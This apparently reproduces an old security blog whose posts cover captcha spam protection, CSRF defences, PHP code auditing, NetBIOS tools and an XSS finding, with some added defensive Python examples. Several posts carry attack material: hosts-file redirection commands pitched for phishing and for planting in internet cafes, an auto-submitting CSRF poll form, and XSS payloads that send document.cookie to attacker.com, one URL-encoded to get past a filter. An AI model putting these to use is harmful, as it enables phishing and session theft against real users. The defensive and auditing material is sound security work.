Got new bait?

May 3, 2008

Maybe this is something already in use (no wondering about it), but it’s worth mentioning…

Real life fishing has never been my favorite activity, not even in my top 100 activities, and as you can imagine neither has phishing… I simply hate planting baits and waiting for someone to fall into my net; and I do see phishing as real life fishing, it’s all about practice/patience/technique, of which I can say that I possess only the last one; however I bought a new type of bait…

Yeah, I’m not speaking of any new phishing method, or of how to hide your fake copy website’s domain; I’m actually re-domaining it (new word here) by manipulating the hosts file (nothing fancy)…

Next time you’re going phishing remember to take the new bait with you… and why not plant it in iCafes for more fish to be caught… How should you use it without complicating stuff? By using the following commands:


echo # >> %WinDir%\system32\drivers\etc\hosts
echo malIP dom.spoof >> %WinDir%\system32\drivers\etc\hosts

The # insertion is needed so the entry starts on a new line (the hosts file doesn’t necessarily end with one); the rest you can deduce yourselves. Also, if you want to have it on one line (more compressed) and more insertable into shellcode, then use the following form:


cd %WinDir%\system32\drivers\etc\ && echo # >> hosts && echo malIP dom.spoof >> hosts

If you catch big fish with this, I don’t mind sharing it… you know, I am usually hungry… especially if you catch a CatFish
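From the defender’s side, here is an added example (mine, not part of the post) that finds hosts entries of the shape those commands append: anything that maps a name to an address other than the local machine. The file contents, the TEST-NET address and the dom.spoof mapping are all constructed.

```python
import ipaddress

# Constructed hosts file content (not taken from any real machine): the usual loopback
# entries, a blocklist-style 0.0.0.0 entry, and an appended redirect of the exact shape
# the commands above produce (a bare "#" line followed by "IP name"). The address is
# from the TEST-NET-2 documentation range.
HOSTS_SAMPLE = """# constructed hosts file
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example      # blocklist entry, points nowhere
#
198.51.100.23 dom.spoof
"""

def parse_hosts(text):
    """Yield (ip_address, [names]) per entry; comments, blank and malformed lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments and the bare "#" line
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:                    # not an IP at all; leave it to a human
            continue
        yield ip, fields[1:]

def suspicious_entries(text):
    """Entries that point a name at a real remote host.

    Loopback (127.0.0.1, ::1) and unspecified (0.0.0.0) addresses are the normal content
    of a hosts file; any other address overrides DNS for that name, which is what a
    hosts-file redirect looks like from the defender's side.
    """
    return [(str(ip), names) for ip, names in parse_hosts(text)
            if not (ip.is_loopback or ip.is_unspecified)]

if __name__ == "__main__":
    for ip, names in suspicious_entries(HOSTS_SAMPLE):
        print(f"{ip} -> {', '.join(names)}")
```

On a real Windows box you would feed it the contents of %WinDir%\system32\drivers\etc\hosts instead of the constructed string.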

less spam on blogs

April 22, 2008

And no it’s not a better solution than Akismet, but will do against spam bots…

This is for those who host blogs/create a blog and don’t have a spam protection module for it. Maybe you’ve seen this type of protection before (and surely you have; e.g. www.darknet.org.uk). Have you guessed it by now? Yes, it’s the “number adding protection”, where you have a last field in a comment form in which you have to add 2 numbers (could even be 1 million if wanted, but then who would post comments?).

The simplest method is the following

<?php
$n1 = rand(0,20);
$n2 = rand(0,20);
$sum = $n1 + $n2;
// the expected answer travels to the client in a hidden field
echo("<input type=\"hidden\" name=\"sum\" value=\"$sum\"/>");
echo("<input type=\"text\" name=\"add\" value=\"\"/> result $n1 + $n2?");
?>

And on the form parsing page

<?php
$sum = $_REQUEST["sum"];
$add = $_REQUEST["add"];
if($sum==$add) {
    //parse the form submitted
}
else {
    header("Location: http://somewebsite.com"); //redirect (if it follows)
    //to a not so preferred blog (the bot)
    exit; //stop the script after sending the redirect header
}
?>

This would be one way to do it, and the less good one, because the bot could be taught to retrieve the value of the sum field, and the whole protection would be of no use. The next method is based on the same technique, only that it uses javascript (keep in mind there are cases when users have deactivated javascript, or for example use NoScript). No php required in this case…

<html>
<head>
<script type="text/javascript">
var n1 = Math.round(Math.random()*20);
var n2 = Math.round(Math.random()*20);
var sum = n1 + n2;
// the "sum" div does not exist until the body is parsed, so fill it in on load
window.onload = function() {
    document.getElementById("sum").innerHTML = "result " + n1 + " + " + n2 + " ?";
};
function formSubmit() {
    // the return value decides whether the browser actually submits the form
    if(document.forms[0][0].value==sum) {
        return true;
    }
    alert("Lack of math skills!");
    return false;
}
</script>
</head>
<body>
<form action="somepage.php" onsubmit="return formSubmit()">
<input type="text" name="add" value=""><div id="sum"></div>
<input type="submit" value="submit">
</form>
</body>
</html>

E(n)D
Of course as always, you can mix them, or even use this method (only the second one) for displaying your emails, because those damn bots can’t parse javascript code… anyway feel free to throw in some interesting ideas, creative ways to stop spam via html/javascript/php code…

Yes… those where the times…

I don’t know how many of you were in the mailbombing scene (shouldn’t even call it a scene)… but there were groups of people who formed small communities (let’s call them that) of mailbombers.

And it was easy to mailbomb… what times… nowadays true mailbombing doesn’t exist…
What do I call true mailbombing? An attack that could render your email address useless…

How could this happen? We can only make some assumptions, because in different days than nowadays, when webmail services (such as Yahoo) had to process many emails at once, they pushed hard and processed them; nowadays (I assume) they queue emails if they come at a high rate (at least gmail does). Another reason why this could happen (referring to the old yahoo also) was the limit of 6mb per email address (nowadays being virtually limitless)…

And a small theory: we (as in me and some other folks that used to mailbomb) used to assume that the Yahoo! webmail service worked in such a way that if a specific email address surpassed its 6mb limitation then that email could no longer be used… It’s just a theory, nobody proved it, but it seemed to work…

Those were the times… when you used apps like HakTek, Avalanche (other programs existed)… or if you used Linux, simple mail scripts…

A myth or a legend… nobody knows…

Take a look at how mailbombing works nowadays… sweet, but not as effective: e-mail bombing in informationleak way

Some time ago when I posted I Love CSRF (XSRF), fazed invited me to do a presentation on CSRF attacks and protection… but since then I haven’t heard about it… Anyway I wrote down my presentation and since I haven’t been asked to do it recently I thought I’d put it on my blog…

What will I trim out of my presentation? The CSRF attack methods; I’ll leave only the defense methods…

Expiring Cookies/Sessions

If you are using cookies to keep your users logged in on your website then you should give your cookies a shorter expiration time, rather than keeping them alive until the browser is closed. Let’s take as an example the following cookie being set


setcookie("auth", md5(md5($password)), time()+600);

This would keep the cookie available for 10 minutes, after which it would expire. But that is not enough; you should put the cookie-setting line in every page of your website, so that on every page access the cookie gets another 10 minutes of life. Kind of rudimentary, but what else can you do if you use cookies?

Expiring sessions are sometimes not controllable by you, only if you host your own website; otherwise there isn’t much you can do…

Referer Check

Most of the time you will count on the referer to check if the request came from the desired page; a simple implementation would be the following


if($_SERVER["HTTP_REFERER"]!="http://mywebsite.com/desired.php") {
    //possible csrf
}

As with other variables not controllable by the website, there are people who deactivate the referer field so that it is not passed to the websites they visit.

Tokens

This may seem like one of the favorite weapons against CSRF, and of course it is as easy to implement as the ones mentioned before. Firstly, let’s assume that on login the token has been set the following way


$_SESSION["token"]=rand();

This would be useful when we generate a form


<form name="form" action="processing.php" method="post">
<input type="hidden" name="token" value="<?php echo md5($_SESSION["token"]); ?>">
<…>
</form>

And now the first thing that we should do on the processing.php page is to check the token


$token = $_POST["token"];

if($token!=md5($_SESSION["token"])) {
    //now this is csrf
    die("....CSRF!");
}

What next?

You only have to choose a way to protect against CSRF… I would recommend mixing the last two, and setting some kind of flags: if the referer isn’t ok, set a possible CSRF flag; and if the token doesn’t match, then flag it as CSRF… But what do I know, I only wrote it for a presentation…
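The “mix the last two and set flags” idea from the paragraph above, written out as an added example (mine, not the presentation’s code): the page stores rand() in $_SESSION["token"] and puts md5() of it in the form; here secrets.token_hex() is used instead and the form carries the token itself. ORIGIN and the three request dicts are constructed.

```python
import hmac
import secrets

# Added example, not the presentation's code: the page stores rand() in $_SESSION["token"]
# and puts md5() of it in the form; here secrets.token_hex() is used instead and the form
# carries the token itself. ORIGIN and the request dicts below are constructed.
ORIGIN = "http://mywebsite.com/"

def issue_token(session):
    """Create the per-session token at login time (the page's $_SESSION["token"] step)."""
    session["token"] = secrets.token_hex(16)
    return session["token"]

def check_referer(headers, expected_origin):
    """The page's referer check, but telling 'missing' apart from 'mismatch', because some
    clients strip the header and should not be treated like a forged request."""
    ref = headers.get("Referer")
    if not ref:
        return "missing"
    return "ok" if ref.startswith(expected_origin) else "mismatch"

def check_token(post, session):
    """The page's token check; compare_digest keeps the comparison constant-time."""
    expected = session.get("token")
    supplied = post.get("token", "")
    return bool(expected) and hmac.compare_digest(supplied.encode(), expected.encode())

def classify(headers, post, session, expected_origin=ORIGIN):
    """The flagging scheme from the text: token mismatch -> "csrf" (reject); token ok but
    referer not ok -> "possible csrf" (flag it, e.g. log or ask for confirmation);
    both ok -> "ok"."""
    if not check_token(post, session):
        return "csrf"
    if check_referer(headers, expected_origin) != "ok":
        return "possible csrf"
    return "ok"

def demo():
    """Run three constructed requests against one session and return their classifications."""
    session = {}
    token = issue_token(session)
    legit = ({"Referer": ORIGIN + "form.php"}, {"token": token})
    no_referer = ({}, {"token": token})                       # referer stripped, token right
    forged = ({"Referer": "http://attacker.example/"}, {"token": "0" * 32})  # cross-site post
    return [classify(h, p, session) for h, p in (legit, no_referer, forged)]

if __name__ == "__main__":
    print(demo())  # ['ok', 'possible csrf', 'csrf']
```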

*UPDATE*

Server Side Protection

Found this after I finished the article; so if you want some server side CSRF protection check this out -> http://0x000000.com/index.php?i=484

Cmd Code Audit (Skavenger)

November 10, 2007

This is going to be a quick how-to on auditing source code under a windows environment without having egrep/sed installed.

Let’s start with the most basic code auditing line:

type file.ext | find /i "string"

While this won’t do much, the following batch script that I use from time to time could be helpful, at least for php code auditing (you may modify it to fit your needs, a.k.a. C/C++/C#/ASP/JSP/etc):

@echo off
echo Auditing %1
type %1 | find /i "$_GET" | more
type %1 | find /i "$_POST" | more
type %1 | find /i "$_REQUEST" | more
type %1 | find /i "include(" | more
@echo on

For more lines to add to it check this. I have to disappoint you, though, because I am going to present a script far better than the above batch file.

Here it comes -> Skavenger
Skavenger is a source code auditing tool, written in PHP and designed around regular expressions, so it can be more versatile than the above script. Not much to say about it; the simplest thing for you to do is download it and fool around with it. For download go to http://code.google.com/p/skavenger/downloads/list.

And if you want to continue the project, and make a better console source code auditing tool, then drop me a line at backbone46 [at] gmail (dot) com…

Source code audit - PHP

October 30, 2007

What is source code audit?
It’s a primary technique by which someone can find vulnerabilities of a website just by inspecting the code.

Consider the following scenarios:

  • find an ftp service exploit and you can download the entire website in its unparsed form
  • have the source of the web application used by the website

What has to be done?
Instead of emulating the real website (setting up a webserver, database, etc.) you can just start analyzing the code for commonly known vulnerable code.

User input
Most of the time user input is passed to the web application via requests, like:

$_GET
$_POST
$_REQUEST
$HTTP_POST_VARS
$HTTP_GET_VARS

And if register_globals is activated in php.ini, user input can be retrieved via <input> names; for example the following html form:

<form name="basic" method="post" action="">
<input type="text" name="myname">
<input type="text" name="age">
<input type="submit" value="age & name">
</form>

…would create and set the following variables:

$myname="user input";
$age="user input";

These requests should always be searched for input validation, or xss/sql injection possibilities.

Internal inclusion
As you can imagine I’m talking about file inclusion, which could lead to lfi/rfi; the php functions that can be exploited for an lfi/rfi attack are:

include()
include_once()
require()
require_once()
virtual()
readfile()

Not much to check here, only the parameters origins, validation…

Indirect User Input
Indirect user input? That sounds weird, but don’t get confused by it; I’m speaking about user-agent information, http referer, cookie reading/writing/printing, session. All together these could lead to xss/sql injection/http response splitting and why not (remote) code execution/file inclusion. Things to look for:

$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["REQUEST_URI"]
$_COOKIE
$_SESSION

Also, an unused Referer here would mean CSRF ways of exploitation; keep that in mind, it might come in handy!

Redirections
Maybe you are not aware of this, but after each header redirection there should be a script termination like exit() or die(), so the following code would be vulnerable:

if($password!=$pass) { header("Location: noadmin.php"); }

Because if the page were requested via a telnet connection (for example), which wouldn’t act on the header, the redirection phase would be skipped and the rest of the page would be visible.

Remote code execution
We already mentioned remote code execution, but it would be better to also note the functions which should be looked at for code execution:

exec()
passthru()
proc_open()
shell_exec()
system()

The rest, the ugly, the not so common
Besides the above mentioned vulnerabilities, which are more common, you could also check image upload scripts for proper type/extension validation, and every other shit that I can’t think of….

Go and analyze source code
I pointed out everything that you need to know before auditing PHP code, but if you think I missed something, don’t bother thinking about it, just drop me a comment…
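As an added example (mine; not Skavenger’s code and not from the page), here are the find /i lines of the Cmd Code Audit post and the lists from this post turned into a small regex auditor, with the Redirections check generalized to flag a header("Location: …") that has no exit()/die() nearby. The PHP snippet it scans is constructed.

```python
import re

# Constructed PHP snippet standing in for a file under audit; not from any real project.
PHP_SAMPLE = r'''<?php
$page = $_GET["page"];
include("pages/" . $page . ".php");
$name = $_REQUEST['name'];
echo "Hello " . $name;
if ($password != $pass) { header("Location: noadmin.php"); }
echo "admin area";
system("convert " . $_POST["file"]);
$ua = $_SERVER["HTTP_USER_AGENT"];
?>'''

# One regex per category from the post: user input, indirect input, inclusion,
# code execution, and header redirects (checked below for a missing exit()/die()).
RULES = {
    "user input":     re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b|\$HTTP_(GET|POST)_VARS\b'),
    "indirect input": re.compile(r'\$_SERVER\[.(HTTP_REFERER|HTTP_USER_AGENT|REQUEST_URI).\]|\$_SESSION\b'),
    "inclusion":      re.compile(r'\b(include|include_once|require|require_once|virtual|readfile)\s*\('),
    "code execution": re.compile(r'\b(exec|passthru|proc_open|shell_exec|system)\s*\('),
    "redirect":       re.compile(r'\bheader\s*\(\s*["\']Location:'),
}
TERMINATOR = re.compile(r'\b(exit|die)\b')

def audit(source):
    """Return (line_no, category, line) findings in file order. A header("Location: ...")
    with no exit()/die() on the same or the next line gets an extra finding, per the
    Redirections section."""
    lines = source.splitlines()
    findings = []
    for no, line in enumerate(lines, 1):
        for cat, rx in RULES.items():
            if rx.search(line):
                findings.append((no, cat, line.strip()))
        if RULES["redirect"].search(line):
            window = line + (lines[no] if no < len(lines) else "")
            if not TERMINATOR.search(window):
                findings.append((no, "redirect without exit", line.strip()))
    return findings

def dangerous_lines(source):
    """Lines where raw user input sits inside an inclusion or code-execution call."""
    return sorted({no for no, cat, line in audit(source)
                   if cat in ("inclusion", "code execution") and RULES["user input"].search(line)})

if __name__ == "__main__":
    for no, cat, line in audit(PHP_SAMPLE):
        print(f"{no:3d} [{cat}] {line}")
```

Like the batch script, this is a grep with labels: line 3 of the sample is only flagged as an inclusion, because the tainted $page reaches include() through an assignment, which no single-line regex can follow.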

PING?PONG!

What?
NetBios hacking…

People screaming: lame dude lame, this stuff is older than my grandma!!!

Stop laughing, screaming, swearing and all that shit… Everybody, I suppose, knows what all the netbios hacking stuff is about, right?
If not, check out a massive tutorial on this subject at Darknet; btw: grab some cigarettes and some beer, because netbios most of the time will be frustrating, as it won’t work due to different types of windows configuration… but that is another story!

This article ain’t about how to use shares, ipc$ or any other shit contained in netbios hacking; it’s about a tool that can perform all that netbios stuff for you and create a decent output file… by the time you are reading this line I suppose you know that the tool is called WinFingerprint.

Things that WinFingerprint can do:

  • enumerates NetBIOS Shares, Users, Groups, and Services
  • scans the entire ‘Network Neighborhood’
  • establishes Null Sessions
  • Registry Querying
  • OS detection and many others
  • And the entire package comes wrapped up with a GUI for the non-command line junkies….

Did I mention it’s not new technology? winfingerprint on packetstorm

I love CSRF (XSRF)

October 7, 2007

I really do love CSRF… and it all started back when I was reading a topic on the w4ck1ng forum; I don’t remember the link but I’ll tell you in a few words. There was this guy who wanted to know if there could be a way to win a poll without constantly changing proxy. The first thing that came to my mind was csrf. Why do the dirty job and manually vote 24/7 so that you can win, when you can create an html page which contains the form with auto-submit and incorporate it in an iframe on a website?

How does the html of such a poll look?

<html>
<body onload="document.poll.submit()">
<form name="poll" action="website.dom/pollvote.php" method="post">
<!-- the poll option; the field name "option" is illustrative, the real one depends on the poll -->
<input type="hidden" name="option" value="3">
</form>
</body>
</html>

This is just an example, for more csrf fun check the CSRF Database

This is basically an idea that came to me a while ago when I came across an XSS vulnerable website, on which I could get hold of the cookie which stored the session identifier…

But firstly, how can a session hijacking take place? Examples based on XSS:

1. The SID is appended in the url, then a simple document.location would help….
2. The SID is stored in the cookie, then what?… document.cookie :-?

But this is not a tutorial about session hijacking; for more info, wikipedia or google.

How was I thinking to strengthen the website against SH?
The magic answer: store an IP per session, so that only the IP that registered the session can take full advantage of it….

Implementation? Too easy to print out the code (maybe in a later article).

Where would it not help? A visitor who has a dynamic IP, or an attacker on the same sub network as the victim (showing up with the same IP)….

Of course this is just a strengthening technique; you should always secure your website in as many ways as possible. I don’t see how an add-on could disadvantage you…

XSS MuWeb

September 26, 2007

Very often when I’ve got nothing to do, I put my thoughts into how to better secure a website/server (it depends). And by accident last week I came upon an XSS vulnerability on a MU server on which I am a co-administrator…

What version of Mutoolz? Don’t know, but if you’re eager to find out browse the web, or simply ask google… Ok, it’s not Mutoolz based; it’s called MuWeb, some custom developed Mu Web Interface by a guy who doesn’t give a damn about security…..

Anyway this MuWeb, which has the most sickly written code [it takes you a good period of time to modify it], could be exploited in the following way:

http://muwebsite.com/index.php?op=<script>alert(/xss/)</script>

Yes, it doesn’t use good filters, just some type of filter based on regular expressions… as I used to say: if you ain’t good at regex, DON’T use them… anyway it filters out double and single quotes; and what? It’s still vulnerable to XSS, but the classical cookie stealing method won’t work:

http://muwebsite.com/index.php?op=<script>document.location='http://attacker.com/steal.php?C='+document.cookie</script>

But we can bypass this filter, can’t we?

http://muwebsite.com/index.php?op=<script>document.location=unescape(
%27%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72
%2E%63%6F%6D%2F%73%74%65%61%6C%2E%70%68%70%3F%43
%3D%27)+document.cookie</script>

Or by using the String.fromCharCode() method; it’s up to the attacker to decide…

My question is… how can someone develop components for a Mu Server if they make it vulnerable at the top layer (web app layer)? Who tests these components? Why don’t they test them accurately?

P.S. Funny thing, after I discovered this XSS vulnerability, I thought I’d find other ones with Acunetix… guess what, Acunetix didn’t even find the XSS vulnerability :-?

P.P.S. No, it’s not the regular MuWeb; it’s one combined with Php-Nuke -> http://softshare.uv.ro/